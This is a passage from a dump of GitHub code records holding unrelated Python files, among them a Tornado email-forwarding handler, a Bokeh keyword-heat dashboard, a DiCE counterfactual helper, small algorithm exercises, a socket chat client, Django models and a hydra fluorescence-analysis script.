tk.Menu(menu)\nmenu.add_cascade(label=\"Help\", menu=help_menu)\nhelp_menu.add_command(label=\"Show Help\", command=display_help)\nwith discordrp.Presence(client_id) as presence:\n print(\"Connected\")\n root.mainloop()","repo_name":"ore0Os/discord_rich_presence","sub_path":"rich_presence.py","file_name":"rich_presence.py","file_ext":"py","file_size_in_byte":9060,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"12812067956","text":"import logging\n\nimport bleach\nimport datetime\nimport tornado.web\nimport json\nfrom settings import email, environment\n\nfrom src.aswwu.base_handlers import BaseHandler\n\nlogger = logging.getLogger(environment[\"log_name\"])\n\n\nclass OpenForumHandler(BaseHandler):\n @tornado.web.authenticated\n def post(self):\n maxChars = 1000\n reply_to = self.current_user.username\n try:\n json_data = json.loads(self.request.body.decode('utf-8'))\n for key in json_data:\n if key == \"recipient\":\n to = adminUsernameExpander(bleach.clean(json_data[key]))\n elif key == \"message_body\":\n body = json_data[key]\n if len(body) > maxChars:\n body = body[0:maxChars]\n body = bleach.clean(body)\n elif key == \"reply-to\":\n reply_to = bleach.clean(json_data[key])\n else:\n self.set_status(500)\n self.write({'status': 'invalid parameters'})\n return\n subject = \"Message from \" + reply_to\n\n emailAdministration(to, subject, body, reply_to)\n self.set_status(200)\n self.write({\"status\": \"success\"})\n\n except Exception as e:\n self.set_status(500)\n self.write({\"status\": \"Error\"})\n print(e.message)\n \n\ndef adminUsernameExpander(recipient):\n \"\"\"Convert an admin position title into the corresponding email address username\n \n TODO: uncomment real addresses\n\n Arguments:\n 
recipient {string} -- the title of an admin position\n Raises:\n ValueError -- When the recipient field doesn't match an ASWWU position\n Returns:\n string -- the username of the aswwu position\n \"\"\"\n\n adminEmails =\t{\n \"President\": \"aswwu.pres\",\n \"Vice President\": \"aswwu.evp\",\n \"Financial VP\": \"aswwu.fvp\",\n \"Social VP\": \"aswwu.spiritual\",\n \"Spiritual VP\": \"aswwu.social\",\n \"Marketing VP\": \"aswwu.marketing\"\n }\n if recipient in adminEmails:\n return adminEmails[recipient]\n else:\n raise ValueError('The selected recipient is not a valid ASWWU Open Forum Recipient.')\n\n\ndef emailAdministration(TO, SUBJECT, BODY, REPLY_TO):\n \"\"\"Send an email using the webmaster account and a custom Reply-To address.\n Arguments:\n TO {string} -- username of email recipient\n SUBJECT {string} -- subject line of the email\n BODY {string} -- body text of the email\n REPLY_TO {string} -- username of message author\n \"\"\"\n import smtplib\n \n domain = \"wallawalla.edu\"\n SEND_USING = email['username'] # Webmaster account, contains @wallawalla.edu\n SEND_TO = TO + \"@\" + domain # admin recipient \n REPLY_TO = REPLY_TO + \"@\" + domain # user who sent the message\n SUBJECT = \"Open Forum Submission: \" + SUBJECT\n TEXT = (\"---- Message from \" + REPLY_TO + \", Sent at \" + str(datetime.datetime.now()) + \" ----\\n\\n\" + BODY + \"\\n\\n---- End Message ----\")\n\n smtpsrv = \"smtp.office365.com\"\n smtpserver = smtplib.SMTP(smtpsrv)\n # smtpserver.set_debuglevel(1)\n smtpserver.ehlo()\n smtpserver.starttls()\n smtpserver.ehlo()\n smtpserver.login(SEND_USING, email['password'])\n\n header = (\n 'To:' + SEND_TO + '\\n' \n + 'From:' + SEND_USING + '\\n' \n + 'Reply-To:' + REPLY_TO + '\\n'\n + 'Subject:%s \\n' % SUBJECT\n )\n msgbody = header + '\\n %s \\n\\n' % TEXT\n\n smtpserver.sendmail(SEND_USING, SEND_TO, msgbody)\n smtpserver.close()\n \n\n","repo_name":"ASWWU-Web/python_server","sub_path":"src/aswwu/route_handlers/homepage.py","file_name":"homepage.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"21831317788","text":"# encoding: utf-8\n\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport os\nimport sys\n\nsys.path.append(\"C:/Users/jgtzsx01/Documents/workspace/zjsxzy_in_js/news-tracking/src/\")\nimport word_heat_level\n\nfrom bokeh.io import curdoc\nfrom bokeh.layouts import row, widgetbox\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.models.widgets import Slider, TextInput, TableColumn, DataTable, Select\nfrom bokeh.plotting import figure\n\nDATA_DIR = \"C:/Users/jgtzsx01/Documents/workspace/data/asset-class\"\n\nsource = ColumnDataSource(data=dict(date=[], ts=[]))\nsource_absolute = ColumnDataSource(data=dict(date=[], ts=[]))\nsource_weighted = ColumnDataSource(data=dict(date=[], ts=[]))\nsource_table = ColumnDataSource(data=dict())\n\ntools = \"pan,wheel_zoom,box_select,reset\"\nplot = figure(plot_height=400, plot_width=1000, tools=tools, x_axis_type='datetime')\nplot_absolute = figure(plot_height=400, plot_width=1000, tools=tools, x_axis_type='datetime')\nplot_weighted= figure(plot_height=400, plot_width=1000, tools=tools, x_axis_type='datetime')\n\nplot.line('date', 'ts', source=source, line_width=3, line_alpha=0.6)\nplot.circle('date', 'ts', size=1, source=source, color=None, selection_color=\"orange\")\nplot_absolute.line('date', 'ts', source=source_absolute, line_width=3, line_alpha=0.6)\nplot_absolute.circle('date', 'ts', 
size=1, source=source_absolute, color=None, selection_color=\"orange\")\nplot_weighted.line('date', 'ts', source=source_weighted, line_width=3, line_alpha=0.6)\nplot_weighted.circle('date', 'ts', size=1, source=source_weighted, color=None, selection_color=\"orange\")\n\ncolumns = [\n TableColumn(field=\"word\", title=\"word\"),\n TableColumn(field=\"distance\", title=\"distance\")\n]\ndata_table = DataTable(source=source_table, columns=columns, width=400, height=300)\n\ndef update_title():\n plot_absolute.title.text = text.value + u\"(绝对)= 周词频\"\n plot.title.text = text.value + u\"(相对)= 周词频 / 周所有词总词频\"\n plot_weighted.title.text = text.value + u\"(加权)= 周词频 * 词距离 / 周所有词总词频\"\n\ndef update_data():\n word = text.value\n threshold = float(slider.value)\n start_date = datetime.datetime(int(year_select.value), 1, 1)\n\n fname = os.path.join(DATA_DIR, \"%s_%.1f.csv\"%(word, threshold))\n try:\n if not os.path.exists(fname):\n print(\"calculating...\")\n plot.title.text = \"calculating...\"\n plot_absolute.title.text = \"calculating...\"\n plot_weighted.title.text = \"calculating...\"\n word_heat_level.get_word_heat(word, threshold=threshold)\n except KeyError:\n plot.title.text = u\"没有该关键词\"\n plot_absolute.title.text = u\"没有该关键词\"\n plot_weighted.title.text = u\"没有该关键词\"\n source_table.data = {}\n return\n\n update_title()\n\n dataframe = pd.read_csv(fname)\n dataframe[\"date\"] = pd.to_datetime(dataframe[\"date\"], format=\"%Y-%m-%d\")\n dataframe = dataframe.set_index('date')\n dataframe = dataframe[dataframe.index >= start_date]\n\n # 加权值曲线\n source_weighted.data = source_weighted.from_df(pd.DataFrame({'ts': dataframe[\"weighted\"]}))\n\n # 相对值曲线\n source.data = source.from_df(pd.DataFrame({'ts': dataframe[\"relative\"]}))\n\n # 绝对值曲线\n source_absolute.data = source_absolute.from_df(pd.DataFrame({'ts': dataframe['absolute']}))\n\n # 词表格\n data = pd.read_csv(\"%s/%s_%s_words.csv\"%(DATA_DIR, word, threshold))\n source_table.data = {'word': data['word'], 'distance': data['distance']}\n\nyears_selections = [str(year) for year in range(2010, 2018)]\nyear_select = Select(value=\"2013\", title=\"开始年份\", width=200, options=years_selections)\nyear_select.on_change(\"value\", lambda attr, old, new: update_data())\nslider = TextInput(title=\"阈值\", value=\"0.3\")\n# slider = Slider(title=\"阈值\", start=0.0, end=1.0, value=0.3, step=0.1)\nslider.on_change('value', lambda attr, old, new: update_data())\ntext = TextInput(title=\"关键词(例如:MPA、房地产、通胀)\", value=u'楼市')\ntext.on_change('value', lambda attr, old, new: update_data())\n\nupdate_data()\n\n# Set up layouts and add to document\ninputs = widgetbox(text, slider, year_select)\ntable = widgetbox(data_table)\n\ncurdoc().add_root(row(inputs, table, plot_absolute, plot, plot_weighted, width=800))\ncurdoc().title = u\"关键词历史热度\"\n","repo_name":"alxsoares/zjsxzy_in_js","sub_path":"news-tracking/app/word_heat/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74803269601","text":"# pip install dice-ml\nimport pandas as pd\nimport dice_ml\n\n#from dice_ml.utils import helpers # helper functions\n\ndef get_data_object(data, continuous_features, to_predict):\n \n \"\"\"\n Gets the required features about the data to be used for getting the countefactuals.\n \n Parameters:\n data: the whole dataset which includes the training and testing dataset\n continuous_features: list of names of features that assumes all the possible values in a 
continuum\n to_predict: the name of the variable to be predicted.\n \n Returns:\n data_object (object): parameters about the data such as such as the range of continuous features and the levels of categorical features. \n \n \"\"\" \n data_object = dice_ml.Data(dataframe=data, continuous_features=continuous_features, outcome_name=to_predict)\n \n return data_object\n\ndef get_explainer_object(model_path, model_backend, data_object):\n \"\"\"\n Provides feature importances to explain the model.\n \n Parameters:\n model: trained model\n model_backend: indicates the implementation type of DiCE we want to use.\n data_object: DiCE data object\n \n Returns:\n explainer (object): provides the feature importances that determines the prediction of the model\n \n \"\"\"\n model_object = dice_ml.Model(model_path=model_path, backend=model_backend) \n \n explainer = dice_ml.Dice(data_object, model_object)\n \n return explainer\n \ndef generate_counterfactual(ready_object, query_instance, number_CF, desired_pred, \n feature_weights, proximity_weight, diversity_weight, feature_to_vary):\n\n \"\"\"\n Generate counterfactual profiles with feature-perturbed versions.\n \n Parameters:\n ready_object: the DiCE class\n query_instance: a query input whose outcome needs to be explained. \n query instance shoulde be in the form of a dictionary; keys: feature name, values: feature value\n number_CF: total number of counterfactuals to generate\n desired_pred: the desired outcome of prediction\n feature_weights: a dictionary; keys: continuous feature name, values: weights. \n proximity_weight: weight for the counterfactuals be closer and feasible to an individual's profile(query instance)\n diversity_weight: weight for the counterfactuals be providing the individual multiple options\n feature_to_vary: a list of features that are allowed to vary since other suggested features are not easily be varied\n\n Returns:\n \n viz(dataframe): profiles with feature-perturbed versions that will produce a desired prediction\n \n \"\"\"\n exp = ready_object\n dice_exp = exp.generate_counterfactuals(query_instance = query_instance, total_CFs=number_CF,\n desired_class=desired_pred, diversity_weight = diversity_weight)\n \n # Visualize counterfactual explanation\n viz = dice_exp.visualize_as_dataframe()\n \n return viz\n","repo_name":"xmpuspus/parity-fairness","sub_path":"parity/counterfactual_explainer.py","file_name":"counterfactual_explainer.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"36606478967","text":"''' Crie um dicionário vazio. 
Peça para o usuário digitar as chaves e os valores desse dicionário.\r\n Em seguida, verifique se a chave 'profissão' está presente no dicionário.\r\n '''\r\ndicionario = {}\r\n\r\nfor i in range(1, 4):\r\n chave = input('Informe a chave: ')\r\n valor = input('informe o valor: ')\r\n \r\n dicionario[chave] = valor\r\n \r\nif 'profissão' in dicionario:\r\n print('A chave profissão esta presente no dicionario')\r\n \r\nelse: \r\n print('A chave profissão não esta presente no dicionario')\r\n \r\n ","repo_name":"Amandacorreia1/PEED---Lista-02","sub_path":"Questao13.py","file_name":"Questao13.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7894352397","text":"import cv2\nfrom vehicle import Vehicle, Global_Variables\nfrom utils.utils import *\n# import pickle\n\n\ndef main():\n counter = 0 # to break after counter number of frames\n window_size = 3\n vehicles = {}\n global_variables = Global_Variables()\n with open(\"../data/car.txt\", \"r\") as f:\n for line in f:\n counter += 1\n if counter < 0:\n continue\n # if counter > 500:\n # break\n val = line.strip().split(\",\")\n frame_num = int(val[0])\n # store the vehicle ids, frame numbers with points\n vehicle_id = val[1]\n x = int(val[2]) + int(val[4])/2\n y = int(val[3]) + int(val[5])/2\n\n # dont check for the first window points\n if vehicle_id not in vehicles:\n vehicles[vehicle_id] = Vehicle()\n vehicles[vehicle_id].num_of_frames_covered = 1\n vehicles[vehicle_id].car_points[frame_num] = (x, y)\n vehicles[vehicle_id].initial_frame = frame_num\n continue\n else:\n # get the initial slope until you reach the window size\n v = vehicles[vehicle_id]\n v.car_points[frame_num] = (x, y)\n v.num_of_frames_covered += 1\n if v.num_of_frames_covered <= window_size:\n continue\n elif v.num_of_frames_covered == window_size+1:\n vector, norm = get_vector((x, y), v, frame_num, window_size)\n v.init_slope = vector\n global_variables.max_norm = max(norm, global_variables.max_norm)\n continue\n\n vector, norm = get_vector((x, y), v, frame_num, window_size)\n theta = angle_between(vector, v.init_slope)\n v.theta.append(theta)\n v.vectors.append(vector)\n v.norms.append((frame_num, norm))\n global_variables.max_norm = max(norm, global_variables.max_norm)\n\n moving = []\n for v_id in vehicles:\n try:\n v = vehicles[v_id]\n for pair in v.norms:\n frame, norm = pair\n if norm > 0.2:\n moving.append(frame)\n # get_plot([i/global_variables.max_norm for i in vehicles[v_id].norms])\n except:\n continue\n print(\"Moving \", len(moving))\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"salmedina/Vehice_Action_Classifier","sub_path":"src/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28891580554","text":"from collections import deque\ndef solution(maps):\n # 동,서,남,북\n dx = [0,0,1,-1]\n dy = [1,-1,0,0]\n # 행 n, 열 m\n n = len(maps)\n m = len(maps[0])\n # 거리를 저장\n visited = [[0] * m for _ in range(n)]\n q = deque()\n # (0,0) 에서 시작\n q.append((0,0))\n visited[0][0] = 1\n while q:\n x,y = q.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m and maps[nx][ny] == 1:\n q.append((nx,ny))\n visited[nx][ny] = visited[x][y] + 1\n maps[nx][ny] = 0\n return visited[-1][-1] if visited[-1][-1] else 
-1\n","repo_name":"sugenius77/Algorithm-Study","sub_path":"프로그래머스/lv2/게임 맵 최단거리.py","file_name":"게임 맵 최단거리.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13463572442","text":"from sys import stdin\r\nfrom collections import deque, defaultdict\r\ninput = stdin.readline\r\n\r\ns,p = map(int,input().split())\r\ndna = input().rstrip()\r\na,c,g,t = map(int,input().split())\r\n\r\ncnt = defaultdict(int)\r\nleft, right = 0, p-1 \r\ndq = deque(dna[left:right])\r\nfor i in dq:\r\n cnt[i] += 1\r\nans = 0\r\n\r\nwhile right < s:\r\n cnt[dna[right]] += 1\r\n\r\n if cnt['A'] >= a and cnt['C'] >= c and cnt['G'] >= g and cnt['T'] >= t:\r\n ans += 1 \r\n \r\n cnt[dna[left]] -= 1\r\n left += 1\r\n right += 1\r\n\r\nprint(ans) ","repo_name":"yootal/CodingTest","sub_path":"백준/Silver/12891. DNA 비밀번호/DNA 비밀번호.py","file_name":"DNA 비밀번호.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29136483596","text":"from socket import AF_INET, socket, SOCK_STREAM\nfrom threading import Thread, Lock\nimport time\n\n\nclass Client:\n \"\"\"\n for communication with server\n \"\"\"\n HOST = \"192.168.0.21\"\n PORT = 5500\n ADDR = (HOST, PORT)\n BUFSIZ = 512\n\n def __init__(self, name):\n \"\"\"\n Init object and send name to server\n :param name: str\n \"\"\"\n self.client_socket = socket(AF_INET, SOCK_STREAM)\n self.client_socket.connect(self.ADDR)\n self.messages = []\n receive_thread = Thread(target=self.receive_messages)\n receive_thread.start()\n self.send_message(name)\n self.lock = Lock()\n\n def receive_messages(self):\n \"\"\"\n receive messages from server\n :return: None\n \"\"\"\n while True:\n try:\n msg = self.client_socket.recv(self.BUFSIZ).decode()\n\n # make sure memory is safe to access\n self.lock.acquire()\n self.messages.append(msg)\n self.lock.release()\n except Exception as e:\n print(\"[EXCPETION]\", e)\n break\n\n def send_message(self, msg):\n \"\"\"\n send messages to server\n :param msg: str\n :return: None\n \"\"\"\n try:\n self.client_socket.send(bytes(msg, \"utf8\"))\n if msg == \"{quit}\":\n self.client_socket.close()\n except Exception as e:\n self.client_socket = socket(AF_INET, SOCK_STREAM)\n self.client_socket.connect(self.ADDR)\n print(e)\n\n def get_messages(self):\n \"\"\"\n :returns a list of str messages\n :return: list[str]\n \"\"\"\n messages_copy = self.messages[:]\n\n # make sure memory is safe to access\n self.lock.acquire()\n self.messages = []\n self.lock.release()\n\n return messages_copy\n \n def disconnect(self):\n self.send_message(\"{quit}\")","repo_name":"techwithtim/Chat-Web-App","sub_path":"old_msg_server/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":306,"dataset":"github-code","pt":"54"} +{"seq_id":"19488448771","text":"# encoding: utf-8\n\n\"\"\"\n@author: suhp\n@contact: peace_su@163.com\n@software: PyCharm\n@file: test_thread.py\n@time: 2016/12/23 12:28\n\"\"\"\n\nimport threading\nfrom time import sleep, ctime\n\ncounters = [0, 0]\nbarrier = threading.Barrier(2)\n\ndef count(thread_num, steps):\n for i in range(steps):\n other = counters[1 - thread_num]\n barrier.wait() # wait for reads to complete\n counters[thread_num] = other + 1\n barrier.wait() # wait for writes to complete\n\ndef threaded_count(steps):\n other = threading.Thread(target=count, args=(1, 
steps))\n other.start()\n count(0, steps)\n print('counters:', counters)\n\nthreaded_count(10)","repo_name":"suheping/python","sub_path":"test/test_thread.py","file_name":"test_thread.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42373325241","text":"from urllib.parse import parse_qs\nfrom utils.DESCrypto import DESCrypto\nfrom config import *\n\n\nclass Request():\n\n def __init__(self):\n self._crypto = DESCrypto(APP_SECRET)\n self.headers = dict()\n self.params = dict()\n self.method = None\n self.path = None\n self.httpVersion = None\n self.data = None\n\n\n\n def getSession(self):\n sessionStr = self.headers.get(\"Cookie\")\n if sessionStr is None:\n return None\n try:\n sessionStr = sessionStr.split(\";\")[0]\n base64Encoded = sessionStr.split(\"=\")[1:]\n base64Encoded = \"=\".join(base64Encoded)\n username = self._crypto.decrypt(base64Encoded)\n return username\n except:\n return None\n\n\n\n @staticmethod\n def getRequest(byteStream):\n '''\n\n :param byteStream:\n :return: Request Object\n '''\n try:\n data = byteStream.decode(\"UTF-8\")\n except:\n print(\"[ByteStream decoding failure]\")\n return None\n\n returnInstance = Request()\n\n httpWords = data.split(\"\\r\\n\")\n\n try:\n requestFields = httpWords[0].split(\" \")\n returnInstance.method = requestFields[0]\n returnInstance.path = requestFields[1]\n returnInstance.httpVersion = requestFields[2]\n except:\n print(\"[Request fields decoding failure]\")\n print(httpWords)\n return None\n\n lineNum = 1\n while lineNum < len(httpWords) and len(httpWords[lineNum]) > 0:\n try:\n headerType, value = httpWords[lineNum].split(\":\")\n returnInstance.headers[headerType] = value\n except:\n pass\n lineNum += 1\n\n lineNum += 1\n\n #handle form data\n if \"Content-Type\" in returnInstance.headers and lineNum < len(httpWords):\n if \"application/x-www-form-urlencoded\" in returnInstance.headers[\"Content-Type\"]:\n data = parse_qs(httpWords[lineNum])\n for k,v in data.items():\n if len(v) == 1:\n data[k] = v[0]\n returnInstance.data=data\n\n\n #handle url params\n if returnInstance.path is not None:\n urlSegs = returnInstance.path.split(\"?\")\n if len(urlSegs)>1:\n params = parse_qs(urlSegs[1])\n for k, v in params.items():\n if len(v) == 1:\n returnInstance.params[k] = v[0]\n else:\n returnInstance.params[k] = v\n \n returnInstance.path = returnInstance.path.split(\"?\")[0]\n\n return returnInstance\n\n\n\n\n\n","repo_name":"Robertation256/MultiClientMessenger","sub_path":"common/templates/Request.py","file_name":"Request.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22307670991","text":"import torch\r\nimport numpy as np \r\nimport numpy as np\r\nimport nibabel as nib\r\nimport scipy.io as scio\r\n\r\nif __name__ == '__main__':\r\n ## lfs_k is the field image with the shape of 2 * H * W * D, where the first channel is real components. \r\n nib_lfs_k = nib.load('lfs_k.nii')\r\n lfs_k = nib_lfs_k.get_fdata() \r\n lfs_k = np.array(lfs_k)\r\n\r\n ## for now pytroch does not support fftshift fucntion, but we can use np.fftshift for fftshift. \r\n lfs_k = np.fft.ifftshift(lfs_k, axes=(1,2,3)) \r\n lfs_k = torch.from_numpy(lfs_k)\r\n\r\n lfs_k = lfs_k.permute(1, 2, 3, 0) ## FFT reconstruciton block. \r\n\r\n lfs_img = torch.ifft(lfs_k, 3)\r\n lfs_img = lfs_img[:,:,:,0] ## get the real channel. 
0: real channel, 1, imaginary channel.\r\n lfs_img = lfs_img.numpy()\r\n\r\n path = 'lfs_img.mat'\r\n scio.savemat(path, {'PRED':lfs_img})\r\n print('end')\r\n","repo_name":"sunhongfu/scripts","sub_path":"pytorch_codes/fft_test.py","file_name":"fft_test.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"26335061043","text":"from django.db import models\nfrom django.utils import timezone\n\nCAT_CHOICES = {\n('Animal', 'Animal'),\n('Throwback', 'Throwback'),\n('Trending', 'Trending'),\n('Relationship', 'Relationship'),\n('BlackTwitter', 'BlackTwitter'),\n('Dank', 'Dank'),\n('Wholesome', 'Wholesome'),\n}\n\nclass Post(models.Model):\n user = models.ForeignKey('auth.User')\n category = models.CharField(max_length=200, choices=CAT_CHOICES, default='Trending Memes')\n text = models.TextField()\n published_date = models.DateTimeField(\n blank=True, null=True)\n def approved_comments(self):\n return self.comments.filter(approved_comment=True)\n\n def publish(self):\n self.published_date = timezone.now()\n self.save()\n\n def __str__(self):\n return self.category\n\nclass Comment(models.Model):\n post = models.ForeignKey('Memetropolis.Post', related_name='comments')\n author = models.CharField(max_length=200)\n text = models.TextField()\n created_date = models.DateTimeField(default=timezone.now)\n approved_comment = models.BooleanField(default=False)\n\n def approve(self):\n self.approved_comment = True\n self.save()\n\n def __str__(self):\n return self.text\n# Create your models here.\n","repo_name":"andthephoenix/thelucentdepths","sub_path":"Memetropolis/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74020848482","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('QT5Agg')\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sys, csv, os\nimport cv2\nfrom tqdm import tqdm\nimport pickle\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.abspath(''), '../..')))\n\nimport hydracv.utils.utils as utils\nfrom hydracv.midline.find_midline_midpoints import extract_midline\n\n\ndef sep_fluo(file_icy, file_dlc, videopath, display=False, start=0, end=-1, scale=(1,1)):\n \"Separate fluorescence to four quarters\"\n\n trace1, trace2, trace3, trace4 = [], [], [], []\n area1, area2, area3, area4 = [], [], [], []\n avg1, avg2, avg3, avg4 = [], [], [], []\n fluos = []\n\n # Load contours and markers\n contours, markers = utils.load_contours_markers(file_icy, file_dlc, scale=scale)\n markers = markers.values\n\n # Loop over frames\n num_frames = len(contours)\n end = num_frames if end == -1 else end\n cap = cv2.VideoCapture(videopath)\n if display:\n plt.figure(figsize=(10,10))\n for iframe in tqdm(range(start, end)):\n\n cap.set(cv2.CAP_PROP_POS_FRAMES, iframe-1)\n ret, frame = cap.read()\n\n marker = markers[iframe]\n contour = contours[iframe]\n\n # Divide contour and extract midpoints\n midpoints, contour_half_1, contour_half_2 = extract_midline(contour, marker, nseg=40)\n midpoints = [(midpoints[i], midpoints[i+1]) for i in range(0, len(midpoints), 2)]\n hyp = midpoints.pop()\n midpoints = np.array(midpoints)\n contour = np.array(contour)\n\n # Extract the polypoints\n midcontour1, index1 = utils.midpoint_of(contour_half_1)\n midcontour2, index2 = utils.midpoint_of(contour_half_2)\n midmid = ((midcontour1[0] + midcontour2[0])/2, 
(midcontour1[1] + midcontour2[1])/2)\n dist_ref = utils.length_segment([hyp, midmid])\n for index in range(len(midpoints)):\n if utils.length_segment([hyp, midpoints[index]]) <= dist_ref:\n break\n\n poly1_ = np.array(list(midpoints[:index]) + [midmid] + [midcontour1] + list(contour_half_1[:index1+1])[::-1])\n poly2_ = np.array(list(midpoints[:index]) + [midmid] + [midcontour2] + list(contour_half_2[:index2+1])[::-1])\n poly3_ = np.array([midmid] + list(midpoints[index:]) + list(contour_half_1[index1+1:][::-1]) + [midcontour1])\n poly4_ = np.array([midmid] + list(midpoints[index:]) + list(contour_half_2[index2+1:][::-1]) + [midcontour2])\n\n poly1 = np.array([poly1_], dtype = np.int32)\n poly2 = np.array([poly2_], dtype = np.int32)\n poly3 = np.array([poly3_], dtype = np.int32)\n poly4 = np.array([poly4_], dtype = np.int32)\n\n # Handle frame and calculate fluorescence\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n if scale == (2,2):\n frame = frame[::2]\n frame = [x[::2] for x in frame]\n fluo1, fluo2, fluo3, fluo4 = 0, 0, 0, 0\n cframe1, cframe2, cframe3, cframe4 = np.zeros_like(frame), np.zeros_like(frame), np.zeros_like(frame), np.zeros_like(frame)\n cv2.fillPoly(cframe1, poly1, 1)\n cv2.fillPoly(cframe2, poly2, 1)\n cv2.fillPoly(cframe3, poly3, 1)\n cv2.fillPoly(cframe4, poly4, 1)\n a1, a2, a3, a4 = np.sum(cframe1), np.sum(cframe2), np.sum(cframe3), np.sum(cframe4)\n area1.append(a1)\n area2.append(a2)\n area3.append(a3)\n area4.append(a4)\n cframe1, cframe2, cframe3, cframe4 = cframe1 * frame, cframe2 * frame, cframe3 * frame, cframe4 * frame\n fluo1, fluo2, fluo3, fluo4 = np.sum(cframe1), np.sum(cframe2), np.sum(cframe3), np.sum(cframe4)\n trace1.append(fluo1)\n trace2.append(fluo2)\n trace3.append(fluo3)\n trace4.append(fluo4)\n avg1.append(fluo1/a1)\n avg2.append(fluo2/a2)\n avg3.append(fluo3/a3)\n avg4.append(fluo4/a4)\n fluos.append(np.sum(frame))\n\n # Plot\n if display:\n plt.clf()\n\n plt.imshow(frame, cmap='gray')\n\n # plt.plot(contour_half_1[:,0], contour_half_1[:,1], 'g.')\n # plt.plot(contour_half_2[:,0], contour_half_2[:,1], 'g.')\n # plt.plot(midpoints[::2], midpoints[1::2], 'r.')\n # plt.plot(midpoints[:,0], midpoints[:,1], 'r.')\n # plt.plot([midcontour1[0], midcontour2[0]], [midcontour1[1], midcontour2[1]], 'purple', linewidth=3)\n # plt.plot(midcontour2[0], midcontour2[1], 'k.')\n # plt.plot(midmid[0], midmid[1], 'k.')\n # plt.plot(midpoints[index][0], midpoints[index][1], 'g.')\n\n plt.fill(poly1_[:,0], poly1_[:,1], alpha = 0.5, color='b')\n plt.fill(poly2_[:,0], poly2_[:,1], alpha = 0.5, color='orange')\n plt.fill(poly3_[:,0], poly3_[:,1], alpha = 0.5, color='g')\n plt.fill(poly4_[:,0], poly4_[:,1], alpha = 0.5, color='r')\n\n plt.xlim(0, len(frame[0]))\n plt.ylim(0, len(frame))\n plt.pause(0.0001)\n\n # Plot intensities\n fig = plt.figure()\n ax1 = fig.add_subplot(221)\n ax1.plot(trace1, linewidth=0.5)\n ax1.plot(trace2, linewidth=0.5)\n ax1.plot(trace3, linewidth=0.5)\n ax1.plot(trace4, linewidth=0.5)\n ax1.plot([trace1[i] + trace2[i] + trace3[i] + trace4[i] for i in range(len(trace1))], 'k', linewidth=1)\n ax1.tick_params(axis='both', which='major', labelsize=4)\n ax1.set_title('Fluorescence', fontsize=6, fontweight='bold')\n ax2 = fig.add_subplot(222)\n ax2.plot(fluos, 'g', linewidth=0.5)\n ax2.tick_params(axis='both', which='major', labelsize=4)\n ax3 = fig.add_subplot(223)\n ax3.plot(area1, linewidth=0.5)\n ax3.plot(area2, linewidth=0.5)\n ax3.plot(area3, linewidth=0.5)\n ax3.plot(area4, linewidth=0.5)\n ax3.tick_params(axis='both', which='major', 
labelsize=4)\n ax3.set_title('Areas', fontsize=6, fontweight='bold')\n ax4 = fig.add_subplot(224)\n ax4.plot(avg1, linewidth=0.5)\n ax4.plot(avg2, linewidth=0.5)\n ax4.plot(avg3, linewidth=0.5)\n ax4.plot(avg4, linewidth=0.5)\n ax4.plot([avg1[i] + avg2[i] + avg3[i] + avg4[i] for i in range(len(avg1))], 'k', linewidth=1)\n ax4.tick_params(axis='both', which='major', labelsize=4)\n ax4.set_title('Averages', fontsize=6, fontweight='bold')\n filename = videopath.split('.avi')[0].split('/')[-1]\n pickle.dump(fig, open(\"../data/figures/sep_fluo_\" + filename + \".fig.pickle\", 'wb'))\n plt.close()\n\n return trace1, trace2, trace3, trace4\n\ndef read_paths(filename):\n df = pd.read_json('../data/config.json')\n file_icy, file_dlc, videopath = df[filename].file_icy, df[filename].file_dlc, df[filename].videopath\n return file_icy, file_dlc, videopath\n\nif __name__ == '__main__':\n FILENAME = \"Pre_Bisect_40x_4fps_ex3\"\n file_icy, file_dlc, videopath = read_paths(FILENAME)\n sep_fluo(file_icy,\n file_dlc,\n videopath,\n display=True,\n start=0,\n end=-1,\n scale=(1,1))\n","repo_name":"hengjiwang/hydracv","sub_path":"hydracv/sep_fluo/sep_fluo.py","file_name":"sep_fluo.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72980766881","text":"from xai_components.base import InArg, OutArg, InCompArg, BaseComponent, Component, 